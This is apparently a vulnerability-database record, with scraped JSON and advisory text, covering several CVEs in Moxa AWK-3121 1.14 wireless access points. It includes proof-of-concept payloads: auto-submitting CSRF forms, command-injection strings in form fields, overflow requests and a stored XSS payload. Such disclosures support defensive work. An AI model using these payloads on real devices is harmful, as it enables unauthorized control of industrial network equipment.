------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10697"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015590"
},
{
"db": "VULHUB",
"id": "VHN-120482"
},
{
"db": "VULMON",
"id": "CVE-2018-10697"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10697",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015590",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-325",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120482",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10697",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120482"
},
{
"db": "VULMON",
"id": "CVE-2018-10697"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015590"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10697"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-325"
}
]
},
"id": "VAR-201906-0787",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-120482"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:03.777000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AWK-3121 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/products/phased-out-products/awk-3121-series"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10697"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015590"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120482"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015590"
},
{
"db": "NVD",
"id": "CVE-2018-10697"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10697"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120482"
},
{
"db": "VULMON",
"id": "CVE-2018-10697"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015590"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10697"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-325"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-120482"
},
{
"db": "VULMON",
"id": "CVE-2018-10697"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015590"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10697"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-325"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120482"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10697"
},
{
"date": "2019-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015590"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.543000",
"db": "NVD",
"id": "CVE-2018-10697"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-325"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-28T00:00:00",
"db": "VULHUB",
"id": "VHN-120482"
},
{
"date": "2023-02-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10697"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015590"
},
{
"date": "2023-02-28T19:29:59.213000",
"db": "NVD",
"id": "CVE-2018-10697"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-325"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-325"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Command injection vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015590"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-325"
}
],
"trust": 0.6
}
}
VAR-201906-0785
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network. However, the same functionality allows an attacker to execute commands on the device. The POST parameters "to1,to2,to3,to4" are all susceptible to buffer overflow. By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. A buffer error vulnerability exists in Moxa AWK-3121 version 1.14. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log).
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a web interface to allow an administrator to manage the device.
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network.
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0785",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 1.8,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015614"
},
{
"db": "NVD",
"id": "CVE-2018-10695"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10695"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10695",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-10695",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-120480",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10695",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
